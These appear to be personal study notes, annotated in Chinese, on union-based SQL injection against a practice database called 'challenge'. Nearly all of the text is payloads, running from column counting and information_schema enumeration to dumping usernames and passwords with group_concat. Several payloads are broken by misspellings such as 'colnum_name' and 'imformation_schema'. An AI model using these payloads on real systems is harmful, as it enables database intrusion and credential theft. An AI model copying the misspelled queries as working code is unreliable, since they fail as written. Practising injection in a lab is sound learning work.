service mysql start;
mysql -u root -q;use mysql;
show databases;
id=1 order by 3 判断列数
id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,user(),database() 查询数据库名
id=-1 union select 1,(select table_name from information_schema.tables where table_schema = 'challenge'),3 从‘challenge’数据库中查询表名
id=-1 union select 1,(select colnum_name from information_schema.colnum where table_schema='challenge' and table_name = table_name),3 从‘challenge’数据库,表名为table_name中的数据库中查询字段名
id=-1 union select 1,(select colnum_name from conum.table_name),3
/////id=-1 union select table_name from imformation_schema.tables where table_schema ='challenge'
id=-1 union select 1,(select group_concat(table_name)from imformation_schema.tables where table_schema ='challenge'),3
id=-1 union select 1,(select group_concat(concat(username,0x7e,password))from challenge.users),3
union 联合查询;
group_concat 结果变成行;
concat(0x7e) 加入分割符;